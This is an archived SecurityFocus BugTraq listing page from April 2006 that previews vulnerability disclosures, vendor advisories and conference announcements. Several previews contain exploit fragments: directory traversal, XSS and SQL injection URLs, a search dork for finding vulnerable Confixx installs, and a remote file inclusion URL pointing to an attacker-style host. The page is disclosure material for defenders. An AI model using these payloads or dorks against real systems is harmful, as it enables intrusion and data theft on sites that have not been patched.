BugTraq Mode:
(Page 1169 of 1748)  < Prev  1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174  Next >
[SECURITY] [DSA 1032-1] New zope-cmfplone packages fix unprivileged data manipulation 2006-04-12
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1032-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
April 12th, 2006

[ more ]  [ reply ]
Microsoft Internet Explorer DBCS Remote Memory Corruption Vulnerability 2006-04-12
Sowhat (smaillist gmail com)
Microsoft Internet Explorer DBCS Remote Memory Corruption Vulnerability

By Sowhat of Nevis Labs
Date: 2006.04.11

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060411.txt
http://www.microsoft.com/technet/security/bulletin/MS06-013.mspx

CVE: CVE-2006-1189

Vendor
Microsoft Inc.

Prod

[ more ]  [ reply ]
2nd European Conference on Computer Network Defense (EC2ND) 2006-04-11
Blyth A J C (Comp) (ajcblyth glam ac uk)
2nd European Conference on Computer Network
Defense (EC2ND)

14th/15th December 2006, School of Computing, University of Glamorgan,
UK.

Call for
Papers

The 2nd European Conference on Computer Network Defense will take place
in December 2006 at the School of Computing, University o

[ more ]  [ reply ]
Re: Buffer-overflow in Ultr@VNC 1.0.1 viewer POC 2006-04-11
phaas redspin com
Ultr@VNC 1.0.1 Client POC Code
--
Though the Server appears safe against remote code execution, the client exploitation is trivial with OllyDbg.
The following POC binds to port 5900 and executes a buffer overflow on vulnerable clients that connect. The client machine will then spawn an instance of

[ more ]  [ reply ]
SAXoPRESS - directory traversal 2006-04-11
securiteam datasec no
SAXoPRESS is a content management system, mainly used for news publishing.

A vulnerability exists in SAXoPRESS, which allows malicious users to read the contents of files on the server, and possibly execute arbitrary commands.

Example exploit:
http://example.com/apps/pbcs.dll/misc?url=../../../../

[ more ]  [ reply ]
Re: google xss 2006-04-10
pagvac (unknown pentester gmail com)
Interesting that it's *not* choosing a tld different to ".com" what
triggers the bug, but rather the language field ("hl").

In other words, if we change
[http://www.google.ae/search?hl=ar&q=<script>alert("1")</script>&meta=]
to [http://www.google.com/search?hl=ar&q=<script>alert("1")</script>&meta=

[ more ]  [ reply ]
IT Underground, London 2006 - call for papers 2006-04-11
it_underground gazeta pl
Hello,

I'd like to announce the call for papers for the IT Underground
2006, a two-day conference organized by Software Conferences and
hakin9.lab team in 28-29 June 2006, London, UK.

IT Underground 2006 is a sixth edition of a conference dedicated to
IT security issues, where remarkable author

[ more ]  [ reply ]
[ MDKSA-2006:070 ] - Updated openvpn packages fix vulnerability 2006-04-11
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:070
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]
IMF 2006 - Submission Deadline Extension 2006-04-11
Oliver Goebel (Goebel CERT Uni-Stuttgart DE)
Dear all,

for your information:

The deadline to submit papers for the IMF Conference 2006 has been
extended to 2006-05-01.

Please excuse possible cross-postings.

------------------------------------------------------------------------
---

CALL FOR PAPERS

[ more ]  [ reply ]
[ MDKSA-2006:071 ] - Updated xscreensaver packages fix clear-text password vulnerability 2006-04-11
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:071
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]
AzDGVote File inclusion 2006-04-11
selfar2002 hotmail com
AzDGVote File inclusion
---------------------------------
Site:http://www.azdg.com/
Demo:http://www.azdg.com/scripts/AzDGVote/vote.php?id=1

---------------------------------------
File inclusion

include $int_path."/AzDG.template.inc.php";

int_path parameter File inclusion

Aut File

vote.php,vi

[ more ]  [ reply ]
[SRC-Telindus advisory] - HP System Management Homepage Remote Unauthorized Access 2006-04-11
SRC Telindus (research src telindus com)
HP System Management Homepage Remote Unauthorized Access
--------------------------------------------------------

[Vulnerability]: Remote Authentication Bypass
[Product]: CompaqHTTPServer/9.9 HP System Management Homepage 2.1.3.132
and above
[Platform]: Microsoft® Windows® - Linux operating system

[ more ]  [ reply ]
Re: Bypassing ISA Server 2004 with IPv6 2006-04-10
noreply romainl com
Hello:

I must say, the title was alarming. But, the body shows someone who doesn't know the difference between an IPv4 and IPv6 network stack. They are different and require different rules. This is why many IDS/IPS/Firewall systems either offer limited or no support for IPv6.

- Anon for my prote

[ more ]  [ reply ]
Re: google xss 2006-04-10
Jim Ley (jim jibbering com)

"Andy Meyers" <andy.meyers (at) hushmail (dot) com [email concealed]> wrote in message
news:20060409235034.1AAAC17042 (at) smtp2.hushmail.com. (dot) . [email concealed]
> My BlackICE stops this from XSS from happening, however changing the URL
> from a .ae domain to a .com and leaving the rest in tact, I am then
> prompted.
>
> http://www.google.com/sear

[ more ]  [ reply ]
Re: Re: PHPList <= 2.10.2 remote commands execution 2006-04-11
rg viza gmail com
Isn't this old news?

Your app is a sieve if you run with register globals on (or have developed your own code to do the same thing and replace it). It's a disaster waiting to happen.

In the PHP manual, the developers of PHP have posted a big fat warning about this. It's easier to secure your code

[ more ]  [ reply ]
[eVuln] VNews Multiple Vulnerabilities 2006-04-11
alex evuln com
New eVuln Advisory:
VNews Multiple Vulnerabilities
http://evuln.com/vulns/112/summary.html

--------------------Summary----------------
eVuln ID: EV0112
CVE: CVE-2006-1543 CVE-2006-1544 CVE-2006-1545
Software: VNews
Sowtware's Web Site: http://www.vscripts.pl/?id=vnews
Versions: 1.2
Critical Level:

[ more ]  [ reply ]
IBM 2006-04-10
ptt btinternet com
Hi,

Does anyone know of a contact at IBM for advisory publication?

Cheers

ptt

[ more ]  [ reply ]
Confixx 3.1.2 <= SQL Injection 2006-04-11
sn4k3 23 gmail com
// Confixx 3.1.2 <= SQL Injection //

-----------------------------------------------------------------

[~] Advisory by: LoK-Crew ~ Snake_23

[-] Exploit: http://www.victim.com/user/index.php?SID=[SQL]

[-] Googledork: inurl:confixx inurl:login|anmeldung

[+] Greetz to: Bluegeek and Team.Rootbox
[

[ more ]  [ reply ]
Tritanium Bulletin Board 1.2.3 - XSS 2006-04-11
d4igoro gmail com
Tritanium Bulletin Board 1.2.3 - XSS Vulnerabilities
--------------------------------------------------------
Software: Tritanium Bulletin Board 1.2.3
Version: 1.2.3
Type: Cross Site Scripting Vulnerability
Date: Die Apr 11 21:57:50 CEST 2006
Vendor: tritanium
Page: http://www.tritanium-scripts.com/

[ more ]  [ reply ]
Manila <= 9.5 - XSS Vulnerabilities 2006-04-11
d4igoro gmail com
Manila <= 9.5 - XSS Vulnerabilities
--------------------------------------------------------
Software: Manila
Version: <= 9.5
Type: Cross Side Scripting Vulnerability
Date: Die Apr 11 21:33:54 CEST 2006
Vendor: UserLand Software
Page: http://manila.userland.com/
Risc: Middle

credits:
--------------

[ more ]  [ reply ]
ZDI-06-007: Microsoft Windows Address Book (WAB) File Format Parsing Vulnerability 2006-04-11
zdi-disclosures 3com com
ZDI-06-007: Microsoft Windows Address Book (WAB) File Format Parsing
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-007.html
April 11, 2006

-- CVE ID:
CVE-2006-0014

-- Affected Vendor:
Microsoft

-- Affected Products:
Windows XP SP2
Windows 2000 SP4

-- TippingPoint(TM) IPS Cust

[ more ]  [ reply ]
[eVuln] [V]Book Multiple Vulnerabilities 2006-04-11
alex evuln com
New eVuln Advisory:
[V]Book Multiple Vulnerabilities
http://evuln.com/vulns/111/summary.html

--------------------Summary----------------
eVuln ID: EV0111
CVE: CVE-2006-1561 CVE-2006-1562 CVE-2006-1563
Software: [V]Book
Sowtware's Web Site: http://www.vscripts.pl/?id=vbook2
Versions: 2.0
Critical Le

[ more ]  [ reply ]
Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities 2006-04-11
Sowhat (smaillist gmail com)
Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities

By Sowhat of Nevis Labs
Date: 2006.03.22

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060322.txt

CVE: CVE-2006-0323
US CERT: VU#231028

Vendor
RealNetworks Inc.

Products affected:

Windows
RealPlayer 8
RealOne Playe

[ more ]  [ reply ]
phpListPro <= 2.0 - Remote File Include Vulnerability 2006-04-11
admin majorsecurity de
phpListPro <= 2.0 - Remote File Include Vulnerability
--------------------------------------------------------
Software: phpListPro
Version: <=2.00
Type: Remote File Include Vulnerability
Date: April, 11th 2006
Vendor: SmartISoft
Page: http://smartisoft.com
Risc: High

Credits:
------------------

[ more ]  [ reply ]
Multiple vulnerabilities in Blur6ex 2006-04-11
crasher kecoak or id

k k kkkk k kkkk k k kkkkkk kkkkkk kkkk k k k k k
k k k k k k k k k kk k k k k kk k k k k
kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k k k kk
k k k k k k k kk k k k k k k k

[ more ]  [ reply ]
[ MDKSA-2006:069 ] - Updated openvpn packages fix vulnerability 2006-04-11
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:069
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]
INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit 2006-04-11
selfar2002 hotmail com

Application : Indexu
version : 5.0.0 5.0.1
URL : http://www.nicecoder.com/

Vulnerable:# INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit

Discovery by SnIpEr_SA

in (theme_path)
this file :
exploit:
http://example.com/indexu/index.php?theme_path=http://evil.t

[ more ]  [ reply ]
Re: function *() php/apache Crash PHP 4.4.2 and 5.1.2 2006-04-10
Michal Zalewski (lcamtuf dione ids pl)
On Sun, 9 Apr 2006 cxib (at) securityreason (dot) com [email concealed] wrote:

> CVE-2006-1549
> [...]
> cxib# php -r 'function cx(){ cx(); } cx();'
> Segmentation fault (core dumped)

I wish I could refrain from asking...

...but how come there's no CVE entry for the bash script in my signature?

--
-------------------------

[ more ]  [ reply ]
Re: PHPList <= 2.10.2 remote commands execution 2006-04-11
secfoc tincan co uk

This vulnerability is caused by the PHP globals problem. http://www.hardened-php.net/globals-problem

Not vulnerable: PHP 4.4.1 and up or PHP 5.1.0 and up

Fix:

add

$GLOBALS = array();

to the top of the config file

[ more ]  [ reply ]
Confixx 3.1.2 <= Cross Site Scripting Vuln 2006-04-10
sn4k3 23 gmail com
// Confixx 3.1.2 <= Cross Site Scripting Vuln //

-----------------------------------------------------------------

[~] Advistory by: LoK-Crew ~ Snake_23

[-] Exploit: http://www.victim.com/allgemein_transfer.php?monat=4&jahr=[XSS]

[-] Googledork: -

[+] Greetz to: Bluegeek and Team.Rootbox
[+] V

[ more ]  [ reply ]
(Page 1169 of 1748)  < Prev  1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus